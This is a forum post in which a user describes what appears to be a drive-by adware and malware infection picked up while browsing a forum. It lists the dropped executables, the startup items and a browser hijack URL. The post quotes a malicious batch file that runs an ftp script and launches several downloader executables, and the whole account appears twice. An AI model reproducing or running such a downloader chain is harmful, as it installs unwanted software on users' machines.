scoutsout
Minstrel Boy
Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).
After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".
I found the following modifications to my system:
Running processes
loader
id53
pef
New desktop Icons:
Lycos Sidesearch
appears to be a browser hijack
0021-bdl94126.exe
No information given in "properties", but icon was a "setup" icon.
CS4P20.exe
Company Name: Clear Search
Product Name: Loader
"o"
No information given in "properties"
"o.bat"
Commands as follows:
if not exist C:\WINDOWSstatuslog ftp -s
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"infamous_downloader.exe",
No information given in "properties"
install2.exe
Company Name: TODO
Product Name: Spawner.exe
silent.exe
No information given in "properties"
New folder under c: "installer", with "id53.exe" in it
New folder under c: "temporary", with stcterms.html in it
New Windows Startup Items:
PowerReg Scheduler.exe
PowerRegSchedulerV3.exe
In c:\windows
"infamous.exe"
In the program files directory
New Folder "Lycos"
New programs "over.exe" and "pup.exe"
After cleaning all of this crap out, starting internet explorer, my browser was hijacked to the following:
http://default-homepage-network.com/start.cgi?hkcu
This morning I see we now have popup windows on the forums side of CFC. That really is too bad.
After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".
I found the following modifications to my system:
Running processes
loader
id53
pef
New desktop Icons:
Lycos Sidesearch
appears to be a browser hijack
0021-bdl94126.exe
No information given in "properties", but icon was a "setup" icon.
CS4P20.exe
Company Name: Clear Search
Product Name: Loader
"o"
No information given in "properties"
"o.bat"
Commands as follows:
if not exist C:\WINDOWSstatuslog ftp -s

if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"infamous_downloader.exe",
No information given in "properties"
install2.exe
Company Name: TODO
Product Name: Spawner.exe
silent.exe
No information given in "properties"
New folder under c: "installer", with "id53.exe" in it
New folder under c: "temporary", with stcterms.html in it
New Windows Startup Items:
PowerReg Scheduler.exe
PowerRegSchedulerV3.exe
In c:\windows
"infamous.exe"
In the program files directory
New Folder "Lycos"
New programs "over.exe" and "pup.exe"
After cleaning all of this crap out, starting internet explorer, my browser was hijacked to the following:
http://default-homepage-network.com/start.cgi?hkcu
This morning I see we now have popup windows on the forums side of CFC. That really is too bad.